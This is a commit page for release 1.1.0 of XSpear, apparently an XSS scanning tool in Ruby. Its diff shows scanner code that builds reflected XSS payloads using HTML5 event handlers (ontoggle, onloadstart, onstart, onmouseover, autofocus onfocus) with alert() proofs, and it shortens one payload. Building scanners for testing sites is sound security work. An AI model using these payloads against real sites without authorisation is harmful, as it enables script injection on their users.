(1.1.0) Releases 1.1.0 / Fixed bug, modify report format, etc..

hahwul · Jul 26, 2019 · 461f894 · 461f894
1 parent 562c720
commit 461f894
Show file tree

Hide file tree

Showing 7 changed files with 145 additions and 103 deletions.
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
diff --git a/XSpear-1.0.9.gem b/XSpear-1.0.9.gem
diff --git a/XSpear-1.1.0.gem b/XSpear-1.1.0.gem
diff --git a/lib/XSpear.rb b/lib/XSpear.rb
@@ -400,7 +400,7 @@ def run
     r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
     r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
     r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', '<meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+    r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
 
     onfocus_tags.each do |t|
       r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)